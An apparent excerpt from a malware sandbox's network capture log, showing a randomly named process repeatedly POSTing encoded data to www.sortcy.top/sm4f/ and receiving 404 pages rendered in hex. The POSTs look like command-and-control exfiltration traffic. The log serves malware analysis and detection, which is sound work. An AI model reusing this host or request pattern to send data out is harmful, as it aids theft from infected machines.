                                                          Data Ascii: .239 6.047 42.989 6.673 21.75.625 57.126-1.679 67.42-5.458 9.806-3.598 13.662-7.027 15.493-5.228 2.396 2.351 1.687 8.008-4.913 12.215-6.252 3.985-27.53 7.2-49.434 7.76-21.904.56-38.604 1.012-49.843-.469" transform="translate(161 68)"/>
                                                          Nov 5, 2024 15:44:33.583183050 CET | 1236 | IN | Data Raw: 33 2d 2e 38 35 2d 2e 35 33 32 2d 2e 39 38 37 4d 32 31 2e 37 32 32 20 31 30 2e 31 30 31 63 2d 2e 34 38 34 2d 2e 32 38 2d 31 2e 31 36 2e 30 38 2d 31 2e 35 34 32 2e 33 37 38 2d 2e 35 37 2e 34 34 34 2d 2e 39 35 37 2e 39 32 34 2d 31 2e 31 35 32 20 31
                                                          Data Ascii: 3-.85-.532-.987M21.722 10.101c-.484-.28-1.16.08-1.542.378-.57.444-.957.924-1.152 1.628-.21.764.802 1.182 1.296.663.4-.42.901-.746 1.308-1.172.319-.334.594-1.205.09-1.497M23.513 15.078c-.385.414-.505 1.566-.513 2.381-.005.47.333.749.47.35.206-.
                                                          Nov 5, 2024 15:44:33.583194017 CET | 1236 | IN | Data Raw: 36 37 38 2e 36 36 34 2e 37 34 31 2e 30 38 2e 30 36 38 2d 2e 36 32 38 2e 34 32 2d 32 2e 34 30 35 2d 2e 33 30 36 2d 32 2e 36 30 38 4d 35 34 2e 38 30 33 20 31 36 2e 33 30 31 63 2d 2e 30 36 35 2d 2e 33 34 37 2d 2e 31 2d 2e 37 30 39 2d 2e 31 39 2d 31
                                                          Data Ascii: 678.664.741.08.068-.628.42-2.405-.306-2.608M54.803 16.301c-.065-.347-.1-.709-.19-1.038-.107-.393-.44-.32-.532.052-.186.746-.052 2.313.405 2.636.225.16.545-.077.512-.623-.024-.375-.13-.676-.195-1.027M39.534 21.024c-.423.212-.58 1.352-.523 2.174
                                                          Nov 5, 2024 15:44:33.583440065 CET | 36 | IN | Data Raw: 38 2e 33 30 31 20 31 2e 37 33 38 2e 37 38 38 20 31 2e 35 38 36 2d 2e 32 34 35 2d 2e 31 34 31 2d 2e 39 36 33
                                                          Data Ascii: 8.301 1.738.788 1.586-.245-.141-.963
                                                          Nov 5, 2024 15:44:33.583451033 CET | 1236 | IN | Data Raw: 2d 2e 37 38 39 2d 31 2e 36 35 32 2d 31 2e 35 35 31 2d 32 2e 30 39 4d 37 38 2e 39 35 35 20 38 2e 30 38 32 63 2d 2e 31 33 34 2d 2e 35 35 2d 2e 32 35 39 2d 31 2e 31 32 36 2d 2e 33 36 36 2d 31 2e 37 30 33 2d 2e 31 30 32 2d 2e 35 34 38 2d 2e 34 35 37
                                                          Data Ascii: -.789-1.652-1.551-2.09M78.955 8.082c-.134-.55-.259-1.126-.366-1.703-.102-.548-.457-.476-.541.05-.073.453-.057.877.01 1.331.083.548.286.874.512 1.17.11.144.276.048.357-.132.097-.215.088-.476.028-.716M87.395 8c-.77.016-1.317.338-2.032.43-.505.06
                                                          Nov 5, 2024 15:44:33.583462954 CET | 1236 | IN | Data Raw: 2e 31 38 31 2d 2e 30 34 33 2e 33 35 37 2d 2e 30 35 33 2e 35 33 39 2d 2e 30 31 33 2e 32 34 35 2e 30 31 36 2e 34 35 2e 30 36 2e 36 31 32 2e 30 39 31 2e 33 33 2e 33 32 2e 35 31 35 2e 35 33 2e 33 30 34 2e 31 30 38 2d 2e 31 31 2e 32 38 36 2d 2e 33 37
                                                          Data Ascii: .181-.043.357-.053.539-.013.245.016.45.06.612.091.33.32.515.53.304.108-.11.286-.37.335-.709.04-.276.058-.554.07-.836.024-.568-.189-1.052-.466-1.306M108.458 14.127c-.434-.548-.995-.921-1.662-1.103-.746-.203-1.116.933-.445 1.28.216.11.4.251.557.
                                                          Nov 5, 2024 15:44:33.588130951 CET | 1236 | IN | Data Raw: 6c 2e 30 32 37 2d 2e 30 35 33 63 2e 30 36 2d 2e 31 31 34 2e 30 38 33 2d 2e 32 36 36 2d 2e 30 32 35 2d 2e 33 37 32 4d 31 30 36 2e 37 39 38 20 32 32 2e 32 32 63 2d 2e 31 30 37 2d 2e 32 39 32 2d 2e 37 35 37 2d 2e 33 30 34 2d 2e 37 39 34 2e 30 32 38
                                                          Data Ascii: l.027-.053c.06-.114.083-.266-.025-.372M106.798 22.22c-.107-.292-.757-.304-.794.028-.032.293.107.618.488.731.229.068.532-.032.507-.257-.021-.186-.137-.329-.201-.502M70.884 28.197c-.13-.291-.716-.24-.83.025-.131.304-.034.606.41.754.101.033.24.03


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          30 | 192.168.2.4 | 50033 | 184.94.215.26 | 80 | 2816 | C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Nov 5, 2024 15:44:35.709397078 CET | 729 | OUT | POST /sm4f/ HTTP/1.1
                                                          Host: www.sortcy.top
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Origin: http://www.sortcy.top
                                                          Referer: http://www.sortcy.top/sm4f/
                                                          Cache-Control: max-age=0
                                                          Content-Length: 224
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Data Raw: 48 30 6b 78 49 56 63 3d 4a 59 73 73 6f 68 33 69 71 43 58 63 4a 4a 74 62 76 62 72 59 46 45 47 6b 35 55 6c 65 6b 4d 57 73 71 2b 36 4a 6e 72 6d 7a 53 58 50 36 43 34 78 75 70 77 52 34 38 53 7a 4f 6c 44 4e 75 64 50 62 6c 32 51 49 4b 70 68 54 58 4f 4d 34 34 66 36 59 6e 55 4a 30 32 2b 74 57 7a 79 63 4e 75 36 59 4a 4e 66 7a 2f 52 42 2b 76 62 67 59 41 4a 5a 79 38 50 49 46 41 72 74 31 78 69 75 72 45 44 4d 48 77 53 56 74 2b 4d 59 74 52 68 52 65 55 7a 57 2b 69 46 59 78 6c 35 54 52 2f 58 77 4e 79 53 72 79 30 64 39 77 70 42 6a 4c 43 64 41 62 70 34 72 48 51 59 79 76 53 73 48 6d 37 4a 53 4c 35 61 30 39 53 43 74 32 6e 53 4e 55 6a 2b 51 50 4d 4a 70 52 4d 59 36 2b 54 68 65 7a 38 3d
                                                          Data Ascii: H0kxIVc=JYssoh3iqCXcJJtbvbrYFEGk5UlekMWsq+6JnrmzSXP6C4xupwR48SzOlDNudPbl2QIKphTXOM44f6YnUJ02+tWzycNu6YJNfz/RB+vbgYAJZy8PIFArt1xiurEDMHwSVt+MYtRhReUzW+iFYxl5TR/XwNySry0d9wpBjLCdAbp4rHQYyvSsHm7JSL5a09SCt2nSNUj+QPMJpRMY6+Thez8=
                                                          Nov 5, 2024 15:44:36.379184961 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                          Date: Tue, 05 Nov 2024 14:44:36 GMT
                                                          Server: Apache
                                                          Content-Length: 13840
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]
                                                          Nov 5, 2024 15:44:36.379194975 CET | 1236 | IN | Data Raw: 28 33 30 64 65 67 29 3b 0a 20 20 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 6c 65 66 74 2d 73 70 61 72 6b 73 7b 0a 20 20 30 25 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 20 0a 20 20 7d 0a 20 20 0a 7d 0a 0a 0a 2e 6d 61 69 6e 7b 0a 20
                                                          Data Ascii: (30deg); }}@keyframes left-sparks{ 0%{ opacity: 0; } }.main{ min-height: 600px; margin: 0px auto; width: auto; max-width: 460px; display: flex; align-items: center; justify-content: center;}.path { str
                                                          Nov 5, 2024 15:44:36.379301071 CET | 1236 | IN | Data Raw: 37 37 34 2d 35 2e 34 33 20 31 2e 34 38 33 2d 31 30 2e 37 36 37 20 33 2e 38 30 38 2d 31 36 2e 33 36 39 20 33 2e 38 34 38 2d 35 2e 36 30 31 2e 30 33 38 2d 31 31 2e 37 36 33 2d 33 2d 31 33 2e 33 38 36 2d 38 2e 38 30 38 2d 31 2e 37 30 37 2d 36 2e 31
                                                          Data Ascii: 774-5.43 1.483-10.767 3.808-16.369 3.848-5.601.038-11.763-3-13.386-8.808-1.707-6.107 2.182-12.41 6.642-16.577 9.072-8.474 21.203-12.707 29.441-22.126 7.927-9.063 11.264-22.574 8.574-34.716-2.692-12.141-11.326-22.538-22.188-26.715-27.683-10.645
                                                          Nov 5, 2024 15:44:36.379324913 CET | 1236 | IN | Data Raw: 31 2e 30 32 20 35 33 2e 31 35 2e 32 32 35 20 36 39 2e 31 38 38 2d 31 35 2e 36 38 35 20 37 30 2e 35 39 2d 31 38 2e 39 37 37 20 32 2e 36 30 35 2d 36 2e 31 31 38 20 31 2e 38 33 38 2d 32 31 2e 33 32 37 2e 30 36 2d 32 32 2e 32 38 33 2d 31 2e 37 37 37
                                                          Data Ascii: 1.02 53.15.225 69.188-15.685 70.59-18.977 2.605-6.118 1.838-21.327.06-22.283-1.777-.956-44.044-3.204-72.446-4.057-28.402-.854-49.872-1.968-62.14 4.057" transform="translate(161 68)"/> <path fill="#E6A95F" d="M34.648 167.758c-8
                                                          Nov 5, 2024 15:44:36.379331112 CET | 848 | IN | Data Raw: 2e 32 33 39 20 36 2e 30 34 37 20 34 32 2e 39 38 39 20 36 2e 36 37 33 20 32 31 2e 37 35 2e 36 32 35 20 35 37 2e 31 32 36 2d 31 2e 36 37 39 20 36 37 2e 34 32 2d 35 2e 34 35 38 20 39 2e 38 30 36 2d 33 2e 35 39 38 20 31 33 2e 36 36 32 2d 37 2e 30 32
                                                          Data Ascii: .239 6.047 42.989 6.673 21.75.625 57.126-1.679 67.42-5.458 9.806-3.598 13.662-7.027 15.493-5.228 2.396 2.351 1.687 8.008-4.913 12.215-6.252 3.985-27.53 7.2-49.434 7.76-21.904.56-38.604 1.012-49.843-.469" transform="translate(161 68)"/>
                                                          Nov 5, 2024 15:44:36.379436970 CET | 1236 | IN | Data Raw: 32 34 33 2d 2e 33 36 33 2e 36 33 2d 2e 36 37 35 2e 37 36 37 2d 31 2e 30 36 34 2e 31 37 33 2d 2e 34 38 36 2d 2e 37 35 33 2d 2e 39 33 2d 31 2e 34 33 2d 2e 36 32 33 4d 32 39 2e 37 39 33 20 39 2e 30 31 32 63 2d 2e 32 36 2d 2e 31 30 38 2d 2e 34 39 38
                                                          Data Ascii: 243-.363.63-.675.767-1.064.173-.486-.753-.93-1.43-.623M29.793 9.012c-.26-.108-.498.532-.62.942-.166.565-.205 1.033-.149 1.674.053.59.424.405.493-.048-.002.014.102-.302.138-.4.093-.247.18-.497.262-.76.113-.359.144-1.297-.124-1.408M38.384 6.056c
                                                          Nov 5, 2024 15:44:36.380254030 CET | 1236 | IN | Data Raw: 37 2d 2e 34 37 39 2d 2e 33 37 2e 30 38 35 2d 2e 32 34 2e 33 31 35 2e 30 34 34 2e 33 39 36 2e 36 30 31 2e 31 37 33 20 31 2e 31 36 38 2e 34 30 38 20 31 2e 38 34 38 2e 35 30 33 2e 34 39 2e 30 36 39 20 31 2e 30 34 32 2d 2e 31 39 39 2e 38 33 35 2d 2e
                                                          Data Ascii: 7-.479-.37.085-.24.315.044.396.601.173 1.168.408 1.848.503.49.069 1.042-.199.835-.42M73.956 10.626c-.231-.836-.735-1.255-1.316-1.507-.24-.104-.5-.147-.75-.1-.148.028-.273.063-.407.161-.032.022-.373.238-.223.161-.282.148-.382.791-.057.979.117.0
                                                          Nov 5, 2024 15:44:36.380422115 CET | 424 | IN | Data Raw: 35 37 2e 39 32 35 2e 31 37 33 2e 32 32 37 2d 2e 30 35 31 2e 34 34 34 2d 2e 31 30 34 2e 37 30 35 2d 2e 31 33 2e 35 32 31 2d 2e 30 35 34 20 31 2e 30 32 31 2d 2e 30 38 39 20 31 2e 32 38 36 2d 2e 33 31 35 2e 30 39 32 2d 2e 30 37 38 2e 30 38 38 2d 2e
                                                          Data Ascii: 57.925.173.227-.051.444-.104.705-.13.521-.054 1.021-.089 1.286-.315.092-.078.088-.182-.03-.255M52.906 8.291c-.191-.24-.402-.204-.634-.28-.218-.073-.326.255-.245.491.117.34.438.509.697.497.26-.01.37-.472.182-.708M80.437 1.283c-.385-.22-.844-.32
                                                          Nov 5, 2024 15:44:36.380429983 CET | 1236 | IN | Data Raw: 2d 2e 37 38 39 2d 31 2e 36 35 32 2d 31 2e 35 35 31 2d 32 2e 30 39 4d 37 38 2e 39 35 35 20 38 2e 30 38 32 63 2d 2e 31 33 34 2d 2e 35 35 2d 2e 32 35 39 2d 31 2e 31 32 36 2d 2e 33 36 36 2d 31 2e 37 30 33 2d 2e 31 30 32 2d 2e 35 34 38 2d 2e 34 35 37
                                                          Data Ascii: -.789-1.652-1.551-2.09M78.955 8.082c-.134-.55-.259-1.126-.366-1.703-.102-.548-.457-.476-.541.05-.073.453-.057.877.01 1.331.083.548.286.874.512 1.17.11.144.276.048.357-.132.097-.215.088-.476.028-.716M87.395 8c-.77.016-1.317.338-2.032.43-.505.06
                                                          Nov 5, 2024 15:44:36.380434990 CET | 212 | IN | Data Raw: 2e 31 38 31 2d 2e 30 34 33 2e 33 35 37 2d 2e 30 35 33 2e 35 33 39 2d 2e 30 31 33 2e 32 34 35 2e 30 31 36 2e 34 35 2e 30 36 2e 36 31 32 2e 30 39 31 2e 33 33 2e 33 32 2e 35 31 35 2e 35 33 2e 33 30 34 2e 31 30 38 2d 2e 31 31 2e 32 38 36 2d 2e 33 37
                                                          Data Ascii: .181-.043.357-.053.539-.013.245.016.45.06.612.091.33.32.515.53.304.108-.11.286-.37.335-.709.04-.276.058-.554.07-.836.024-.568-.189-1.052-.466-1.306M108.458 14.127c-.434-.548-.995-.921-1.662-1.103-.746-.203-1.116.
                                                          Nov 5, 2024 15:44:36.386878967 CET | 1236 | IN | Data Raw: 39 33 33 2d 2e 34 34 35 20 31 2e 32 38 2e 32 31 36 2e 31 31 2e 34 2e 32 35 31 2e 35 35 37 2e 34 34 33 2e 32 30 34 2e 32 34 38 2e 34 32 2e 36 34 38 2e 36 37 32 2e 38 34 2e 33 34 38 2e 32 36 32 2e 38 36 38 2e 36 34 35 20 31 2e 32 34 39 2e 32 33 2e
                                                          Data Ascii: 933-.445 1.28.216.11.4.251.557.443.204.248.42.648.672.84.348.262.868.645 1.249.23.437-.478-.064-1.305-.37-1.69M117.71 13.184c-.282.276-.558.555-.852.815-.143.126-.333.256-.446.42-.108.156-.174.34-.284.489-.392.535.193 1.412.694.973.104-.091.31


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          31 | 192.168.2.4 | 50034 | 184.94.215.26 | 80 | 2816 | C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Nov 5, 2024 15:44:38.259994030 CET | 10811 | OUT | POST /sm4f/ HTTP/1.1
                                                          Host: www.sortcy.top
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Origin: http://www.sortcy.top
                                                          Referer: http://www.sortcy.top/sm4f/
                                                          Cache-Control: max-age=0
                                                          Content-Length: 10304
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Data Raw: 48 30 6b 78 49 56 63 3d 4a 59 73 73 6f 68 33 69 71 43 58 63 4a 4a 74 62 76 62 72 59 46 45 47 6b 35 55 6c 65 6b 4d 57 73 71 2b 36 4a 6e 72 6d 7a 53 58 48 36 43 4f 39 75 76 58 39 34 39 53 7a 4f 76 6a 4e 76 64 50 61 39 32 51 51 30 70 68 58 70 4f 4a 38 34 64 5a 51 6e 57 34 30 32 31 74 57 7a 38 4d 4e 74 6e 49 4a 69 66 33 6a 56 42 2b 2f 62 67 59 41 4a 5a 7a 73 50 4d 58 6b 72 76 31 78 6c 2b 37 45 48 61 33 77 70 56 74 6e 78 59 74 56 58 45 36 67 7a 50 61 4f 46 66 44 39 35 4d 68 2f 5a 33 4e 79 30 72 79 35 44 39 77 31 6a 6a 4c 62 56 41 63 68 34 72 67 74 34 71 66 44 77 61 58 75 55 45 70 5a 66 76 4e 75 52 75 31 33 54 63 58 6e 2b 51 65 38 31 7a 6a 4d 49 71 75 66 70 4d 79 34 58 57 67 43 43 6f 77 30 42 48 30 55 7a 68 71 49 45 63 79 42 61 61 56 37 2b 50 78 42 50 66 47 6f 71 38 37 35 72 44 55 63 4a 51 50 50 4b 39 6c 36 59 59 2f 4a 59 53 34 62 33 7a 54 46 38 38 7a 70 41 67 59 45 62 45 2f 32 53 50 55 4c 50 49 70 55 6b 41 54 6f 33 4d 48 41 41 4b 73 32 6e 79 45 74 32 6a 79 77 36 67 45 53 48 6c 79 78 67 6d 7a 52 4e 45 66 [TRUNCATED]
                                                          Data Ascii: H0kxIVc= [TRUNCATED]
                                                          Nov 5, 2024 15:44:38.988576889 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                          Date: Tue, 05 Nov 2024 14:44:38 GMT
                                                          Server: Apache
                                                          Content-Length: 13840
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]
                                                          Nov 5, 2024 15:44:38.988653898 CET | 1236 | IN | Data Raw: 28 33 30 64 65 67 29 3b 0a 20 20 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 6c 65 66 74 2d 73 70 61 72 6b 73 7b 0a 20 20 30 25 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 20 0a 20 20 7d 0a 20 20 0a 7d 0a 0a 0a 2e 6d 61 69 6e 7b 0a 20
                                                          Data Ascii: (30deg); }}@keyframes left-sparks{ 0%{ opacity: 0; } }.main{ min-height: 600px; margin: 0px auto; width: auto; max-width: 460px; display: flex; align-items: center; justify-content: center;}.path { str
                                                          Nov 5, 2024 15:44:38.988662004 CET | 1236 | IN | Data Raw: 37 37 34 2d 35 2e 34 33 20 31 2e 34 38 33 2d 31 30 2e 37 36 37 20 33 2e 38 30 38 2d 31 36 2e 33 36 39 20 33 2e 38 34 38 2d 35 2e 36 30 31 2e 30 33 38 2d 31 31 2e 37 36 33 2d 33 2d 31 33 2e 33 38 36 2d 38 2e 38 30 38 2d 31 2e 37 30 37 2d 36 2e 31
                                                          Data Ascii: 774-5.43 1.483-10.767 3.808-16.369 3.848-5.601.038-11.763-3-13.386-8.808-1.707-6.107 2.182-12.41 6.642-16.577 9.072-8.474 21.203-12.707 29.441-22.126 7.927-9.063 11.264-22.574 8.574-34.716-2.692-12.141-11.326-22.538-22.188-26.715-27.683-10.645
                                                          Nov 5, 2024 15:44:38.988699913 CET | 1236 | IN | Data Raw: 31 2e 30 32 20 35 33 2e 31 35 2e 32 32 35 20 36 39 2e 31 38 38 2d 31 35 2e 36 38 35 20 37 30 2e 35 39 2d 31 38 2e 39 37 37 20 32 2e 36 30 35 2d 36 2e 31 31 38 20 31 2e 38 33 38 2d 32 31 2e 33 32 37 2e 30 36 2d 32 32 2e 32 38 33 2d 31 2e 37 37 37
                                                          Data Ascii: 1.02 53.15.225 69.188-15.685 70.59-18.977 2.605-6.118 1.838-21.327.06-22.283-1.777-.956-44.044-3.204-72.446-4.057-28.402-.854-49.872-1.968-62.14 4.057" transform="translate(161 68)"/> <path fill="#E6A95F" d="M34.648 167.758c-8
                                                          Nov 5, 2024 15:44:38.988706112 CET | 848 | IN | Data Raw: 2e 32 33 39 20 36 2e 30 34 37 20 34 32 2e 39 38 39 20 36 2e 36 37 33 20 32 31 2e 37 35 2e 36 32 35 20 35 37 2e 31 32 36 2d 31 2e 36 37 39 20 36 37 2e 34 32 2d 35 2e 34 35 38 20 39 2e 38 30 36 2d 33 2e 35 39 38 20 31 33 2e 36 36 32 2d 37 2e 30 32
                                                          Data Ascii: .239 6.047 42.989 6.673 21.75.625 57.126-1.679 67.42-5.458 9.806-3.598 13.662-7.027 15.493-5.228 2.396 2.351 1.687 8.008-4.913 12.215-6.252 3.985-27.53 7.2-49.434 7.76-21.904.56-38.604 1.012-49.843-.469" transform="translate(161 68)"/>
                                                          Nov 5, 2024 15:44:38.988712072 CET | 1236 | IN | Data Raw: 32 34 33 2d 2e 33 36 33 2e 36 33 2d 2e 36 37 35 2e 37 36 37 2d 31 2e 30 36 34 2e 31 37 33 2d 2e 34 38 36 2d 2e 37 35 33 2d 2e 39 33 2d 31 2e 34 33 2d 2e 36 32 33 4d 32 39 2e 37 39 33 20 39 2e 30 31 32 63 2d 2e 32 36 2d 2e 31 30 38 2d 2e 34 39 38
                                                          Data Ascii: 243-.363.63-.675.767-1.064.173-.486-.753-.93-1.43-.623M29.793 9.012c-.26-.108-.498.532-.62.942-.166.565-.205 1.033-.149 1.674.053.59.424.405.493-.048-.002.014.102-.302.138-.4.093-.247.18-.497.262-.76.113-.359.144-1.297-.124-1.408M38.384 6.056c
                                                          Nov 5, 2024 15:44:38.988718987 CET | 1236 | IN | Data Raw: 37 2d 2e 34 37 39 2d 2e 33 37 2e 30 38 35 2d 2e 32 34 2e 33 31 35 2e 30 34 34 2e 33 39 36 2e 36 30 31 2e 31 37 33 20 31 2e 31 36 38 2e 34 30 38 20 31 2e 38 34 38 2e 35 30 33 2e 34 39 2e 30 36 39 20 31 2e 30 34 32 2d 2e 31 39 39 2e 38 33 35 2d 2e
                                                          Data Ascii: 7-.479-.37.085-.24.315.044.396.601.173 1.168.408 1.848.503.49.069 1.042-.199.835-.42M73.956 10.626c-.231-.836-.735-1.255-1.316-1.507-.24-.104-.5-.147-.75-.1-.148.028-.273.063-.407.161-.032.022-.373.238-.223.161-.282.148-.382.791-.057.979.117.0
                                                          Nov 5, 2024 15:44:38.988725901 CET | 424 | IN | Data Raw: 35 37 2e 39 32 35 2e 31 37 33 2e 32 32 37 2d 2e 30 35 31 2e 34 34 34 2d 2e 31 30 34 2e 37 30 35 2d 2e 31 33 2e 35 32 31 2d 2e 30 35 34 20 31 2e 30 32 31 2d 2e 30 38 39 20 31 2e 32 38 36 2d 2e 33 31 35 2e 30 39 32 2d 2e 30 37 38 2e 30 38 38 2d 2e
                                                          Data Ascii: 57.925.173.227-.051.444-.104.705-.13.521-.054 1.021-.089 1.286-.315.092-.078.088-.182-.03-.255M52.906 8.291c-.191-.24-.402-.204-.634-.28-.218-.073-.326.255-.245.491.117.34.438.509.697.497.26-.01.37-.472.182-.708M80.437 1.283c-.385-.22-.844-.32
                                                          Nov 5, 2024 15:44:38.989149094 CET | 1236 | IN | Data Raw: 2d 2e 37 38 39 2d 31 2e 36 35 32 2d 31 2e 35 35 31 2d 32 2e 30 39 4d 37 38 2e 39 35 35 20 38 2e 30 38 32 63 2d 2e 31 33 34 2d 2e 35 35 2d 2e 32 35 39 2d 31 2e 31 32 36 2d 2e 33 36 36 2d 31 2e 37 30 33 2d 2e 31 30 32 2d 2e 35 34 38 2d 2e 34 35 37
                                                          Data Ascii: -.789-1.652-1.551-2.09M78.955 8.082c-.134-.55-.259-1.126-.366-1.703-.102-.548-.457-.476-.541.05-.073.453-.057.877.01 1.331.083.548.286.874.512 1.17.11.144.276.048.357-.132.097-.215.088-.476.028-.716M87.395 8c-.77.016-1.317.338-2.032.43-.505.06
                                                          Nov 5, 2024 15:44:38.989156961 CET | 1236 | IN | Data Raw: 2e 31 38 31 2d 2e 30 34 33 2e 33 35 37 2d 2e 30 35 33 2e 35 33 39 2d 2e 30 31 33 2e 32 34 35 2e 30 31 36 2e 34 35 2e 30 36 2e 36 31 32 2e 30 39 31 2e 33 33 2e 33 32 2e 35 31 35 2e 35 33 2e 33 30 34 2e 31 30 38 2d 2e 31 31 2e 32 38 36 2d 2e 33 37
                                                          Data Ascii: .181-.043.357-.053.539-.013.245.016.45.06.612.091.33.32.515.53.304.108-.11.286-.37.335-.709.04-.276.058-.554.07-.836.024-.568-.189-1.052-.466-1.306M108.458 14.127c-.434-.548-.995-.921-1.662-1.103-.746-.203-1.116.933-.445 1.28.216.11.4.251.557.
